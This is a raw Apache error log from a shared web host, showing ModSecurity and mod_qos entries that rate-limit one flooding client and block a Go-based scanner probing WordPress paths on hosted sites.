[Tue May 26 20:00:14.348531 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1azQAAAKU"]
[Tue May 26 20:00:14.356777 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1axwAAAIU"]
[Tue May 26 20:00:14.361347 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-OwAAAF8"]
[Tue May 26 20:00:14.367016 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1ayQAAAOs"]
[Tue May 26 20:00:14.367120 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-EwAAAFw"]
[Tue May 26 20:00:14.376161 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-EAAAACs"]
[Tue May 26 20:00:14.378166 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-OAAAAFg"]
[Tue May 26 20:00:14.387777 2026] [security2:error] [pid 106517:tid 106773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a4wAAAP8"]
[Tue May 26 20:00:14.389296 2026] [security2:error] [pid 106517:tid 106668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1aqwAAAJc"]
[Tue May 26 20:00:14.398733 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-GQAAAHs"]
[Tue May 26 20:00:14.398817 2026] [security2:error] [pid 106517:tid 106726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1asQAAANA"]
[Tue May 26 20:00:14.399924 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-FQAAABk"]
[Tue May 26 20:00:14.402781 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a2QAAAPI"]
[Tue May 26 20:00:14.406395 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-PQAAAHQ"]
[Tue May 26 20:00:14.407781 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a4AAAAME"]
[Tue May 26 20:00:14.413810 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-OgAAAAk"]
[Tue May 26 20:00:14.414581 2026] [security2:error] [pid 106517:tid 106712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a5AAAAMI"]
[Tue May 26 20:00:14.539953 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-2gAAACw
[Tue May 26 20:00:14.554443 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-2wAAAFg
[Tue May 26 20:00:14.567002 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-3AAAACQ
[Tue May 26 20:00:14.567004 2026] [qos:error] [pid 106517:tid 106658] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWudoZZc2DoU1lPnP1bVAAAAI0
[Tue May 26 20:00:14.567763 2026] [qos:error] [pid 106517:tid 106752] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudoZZc2DoU1lPnP1bVQAAAOo
[Tue May 26 20:00:14.569144 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-3QAAABc
[Tue May 26 20:00:14.569951 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-3gAAABc
[Tue May 26 20:00:14.571233 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-3wAAAC4
[Tue May 26 20:00:14.572265 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-4AAAADE
[Tue May 26 20:00:14.574668 2026] [qos:error] [pid 106517:tid 106690] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudoZZc2DoU1lPnP1bVgAAAKw
[Tue May 26 20:00:14.676474 2026] [security2:error] [pid 106517:tid 106687] [client 103.163.220.44:48711] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/fukasawa/inc/classes/403.php"] [unique_id "ahWudoZZc2DoU1lPnP1bWwAAAKk"]
[Tue May 26 20:00:14.691988 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-4QAAAFk
[Tue May 26 20:00:14.707498 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-4gAAAAI
[Tue May 26 20:00:14.715269 2026] [qos:error] [pid 106517:tid 106726] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudoZZc2DoU1lPnP1bXgAAANA
[Tue May 26 20:00:14.715370 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-5AAAAH4
[Tue May 26 20:00:14.716967 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-5QAAAHs
[Tue May 26 20:00:14.720598 2026] [qos:error] [pid 106517:tid 106760] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudoZZc2DoU1lPnP1bYQAAAPI
[Tue May 26 20:00:14.720865 2026] [qos:error] [pid 93576:tid 93730] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-5gAAABI
[Tue May 26 20:00:14.722432 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-5wAAABk
[Tue May 26 20:00:14.725766 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-6AAAADI
[Tue May 26 20:00:14.729000 2026] [qos:error] [pid 106517:tid 106712] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudoZZc2DoU1lPnP1bYwAAAMI
[Tue May 26 20:00:14.842198 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-6QAAAHo
[Tue May 26 20:00:14.861089 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-6gAAAAw
[Tue May 26 20:00:14.865548 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-6wAAAEA
[Tue May 26 20:00:14.866249 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-7AAAAEA
[Tue May 26 20:00:14.870194 2026] [qos:error] [pid 106517:tid 106730] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudoZZc2DoU1lPnP1bZgAAANQ
[Tue May 26 20:00:14.870580 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-7wAAAE0
[Tue May 26 20:00:14.872337 2026] [qos:error] [pid 106517:tid 106661] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudoZZc2DoU1lPnP1bZwAAAJA
[Tue May 26 20:00:14.878167 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-8AAAADM
[Tue May 26 20:00:14.883004 2026] [qos:error] [pid 106517:tid 106706] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudoZZc2DoU1lPnP1bagAAALw
[Tue May 26 20:00:14.883175 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-8QAAABo
[Tue May 26 20:00:14.992400 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-9QAAABQ
[Tue May 26 20:00:15.002119 2026] [security2:error] [pid 106517:tid 106734] [client 195.2.79.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bbAAAANg"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1224898&moderation-hash=5bab754b47d74ed2554a03bd03e0a17e
[Tue May 26 20:00:15.013138 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz-9wAAACQ
[Tue May 26 20:00:15.014001 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz--QAAACQ
[Tue May 26 20:00:15.014636 2026] [qos:error] [pid 93576:tid 93817] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz--AAAAGk
[Tue May 26 20:00:15.018575 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1bcQAAANs
[Tue May 26 20:00:15.019429 2026] [qos:error] [pid 106517:tid 106746] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1bcwAAAOQ
[Tue May 26 20:00:15.020443 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz--gAAAC4
[Tue May 26 20:00:15.031246 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz-_AAAACA
[Tue May 26 20:00:15.034830 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz-_QAAAAQ
[Tue May 26 20:00:15.036506 2026] [qos:error] [pid 106517:tid 106752] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1bdQAAAOo
[Tue May 26 20:00:15.098820 2026] [security2:error] [pid 106517:tid 106658] [client 209.163.119.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bdAAAAI0"], referer: https://www.anujtradingco.com/
[Tue May 26 20:00:15.142758 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_AAAAAGo
[Tue May 26 20:00:15.161352 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_AQAAAH8
[Tue May 26 20:00:15.164768 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_AgAAAEw
[Tue May 26 20:00:15.164978 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_AwAAAAA
[Tue May 26 20:00:15.166376 2026] [qos:error] [pid 106517:tid 106653] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1bewAAAIg
[Tue May 26 20:00:15.166446 2026] [qos:error] [pid 106517:tid 106777] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1bfAAAAQM
[Tue May 26 20:00:15.169385 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_BAAAAFk
[Tue May 26 20:00:15.176918 2026] [security2:error] [pid 93576:tid 93728] [client 103.163.220.23:30911] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/config.php"] [unique_id "ahWud2DRMqfxdEDkosz_BgAAABA"]
[Tue May 26 20:00:15.186070 2026] [qos:error] [pid 93576:tid 93730] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_CAAAABI
[Tue May 26 20:00:15.187522 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_CQAAABk
[Tue May 26 20:00:15.191355 2026] [qos:error] [pid 106517:tid 106739] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1bfwAAAN0
[Tue May 26 20:00:15.285758 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-TgAAAFM"]
[Tue May 26 20:00:15.295251 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a6AAAANM"]
[Tue May 26 20:00:15.305340 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-UQAAAGQ"]
[Tue May 26 20:00:15.308104 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-UgAAAC0"]
[Tue May 26 20:00:15.312495 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-YgAAAFU"]
[Tue May 26 20:00:15.313080 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a-gAAAPE"]
[Tue May 26 20:00:15.314422 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-UAAAAAg"]
[Tue May 26 20:00:15.324530 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-YQAAAC8"]
[Tue May 26 20:00:15.324982 2026] [security2:error] [pid 106517:tid 106684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a8QAAAKY"]
[Tue May 26 20:00:15.328212 2026] [security2:error] [pid 106517:tid 106675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a8AAAAJ4"]
[Tue May 26 20:00:15.331442 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a7QAAAJQ"]
[Tue May 26 20:00:15.337257 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a6QAAAKc"]
[Tue May 26 20:00:15.340436 2026] [security2:error] [pid 106517:tid 106776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a-wAAAQI"]
[Tue May 26 20:00:15.360010 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1a_gAAAPA"]
[Tue May 26 20:00:15.360829 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1bDwAAAJU"]
[Tue May 26 20:00:15.364801 2026] [security2:error] [pid 106517:tid 106761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1bBQAAAPM"]
[Tue May 26 20:00:15.365012 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-WQAAACo"]
[Tue May 26 20:00:15.369321 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-YwAAAEE"]
[Tue May 26 20:00:15.379502 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-aAAAAGE"]
